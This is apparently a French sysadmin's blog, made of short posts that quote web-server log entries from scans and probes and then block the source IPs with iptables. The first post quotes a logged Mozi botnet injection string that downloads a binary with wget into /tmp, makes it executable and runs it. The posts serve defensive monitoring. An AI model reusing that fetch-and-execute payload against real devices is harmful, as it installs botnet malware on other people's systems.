Faille de securité sur « wget » via http ?

9 x served & 1 x viewed

J’ai pu voir dans mes logs :

125.43.243.4 - - [14/Oct/2021:12:53:13 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"

J’ai donc filtré l’IP :

# iptables -A INPUT -s 125.43.243.4 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misère.

IP Address Country Region City
125.43.243.4 China Henan Jiaozuo
ISP Organization Latitude Longitude
China Unicom Henan Province Network Not Available 35.2397 113.2331

Faille de sécurité sur « \x03 » ou « \x16\x03\x01 » en HTTP ?!

17 x served & 5 x viewed

J’ai pu observer des requetes de ce type :

45.146.166.156 - - [14/Oct/2021:11:42:23 +0200] "\x03" 400 0 "-" "-"
89.248.165.23 - - [13/Oct/2021:05:43:09 +0200] "\x03" 400 0 "-" "-"
45.141.87.54 - - [13/Oct/2021:18:52:16 +0200] "\x03" 400 0 "-" "-"

Dans le route je bloque donc les IP :

# iptables -A INPUT -s 45.146.166.156  -j DROP
# iptables -A INPUT -s 89.248.165.23  -j DROP
# iptables -A INPUT -s 45.141.87.54  -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

A suivre.

A noter, que quand c’est Russian Federation c’est pas pour mon bien … Misère :

IP Address Country Region City
45.141.87.54 Russian Federation Sankt-Peterburg Saint Petersburg
IP Address Country Region City
45.146.166.156 Russian Federation Moskva Moscow

Update, je pense qu’il y a plusieurs requetes :

# grep '\x03' /var/log/apache2/access.* | sed 's/:/ /g' | awk '{print $2 " " $10}' | sort -n | uniq -c
      1 45.141.87.54 "\x03"
      1 45.146.166.156 "\x03"
      1 89.248.165.23 "\x03"
      4 121.46.25.189 "\x16\x03\x01"
      1 183.136.225.42 "\x16\x03\x01\x02"
      3 185.193.88.50 "\x03"
      2 200.37.200.185 "\x16\x03\x01"

Pour les IP :

IP Address Country Region City
200.37.200.185 Peru Cusco Cusco
ISP Organization Latitude Longitude
Zotac Tacna Not Available -13.5183 -71.9781
IP Address Country Region City
183.136.225.42 China Zhejiang Jiaxing
ISP Organization Latitude Longitude
ChinaNet Zhejiang Province Network Not Available 30.7522 120.7500
IP Address Country Region City
121.46.25.189 China Guangdong Guangzhou
ISP Organization Latitude Longitude
Guangdong Aofei Data Technology Co. Ltd. Not Available 23.1167 113.2500

Faille de sécurité sur /actuator/health ?! ( Baeldung ?!)

9 x served & 3 x viewed

J’observe des scans sur /actuator/health  , par exemple :

192.241.204.32 - - [14/Oct/2021:09:25:02 +0200] "GET /actuator/health HTTP/1.1" 302 4947 "-" "Mozilla/5.0 zgrab/0.x"
192.241.198.123 - - [13/Oct/2021:09:23:33 +0200] "GET /actuator/health HTTP/1.1" 302 4947 "-" "Mozilla/5.0 zgrab/0.x"

Si je regarde les IP cela vient des US … donc je filtre :

# iptables -A INPUT -s 192.241.204.32 -j DROP
# iptables -A INPUT -s 192.241.198.123  -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

A suivre.

 

Faille de securité phpmyadminxxxx via des scans

19 x served & 0 x viewed

Voici un petit exemple de scan :

27.120.170.139 - - [13/Oct/2021:11:49:46 +0200] "GET /phpmyadmin2016/index.php?lang=en HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"

Il faut lire l’article : https://isc.sans.edu/forums/diary/Increase+of+phpMyAdmin+scans/22688/ .

J’ai donc bloqué l’IP :

# iptables -A INPUT -s 27.120.170.139 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

A suivre.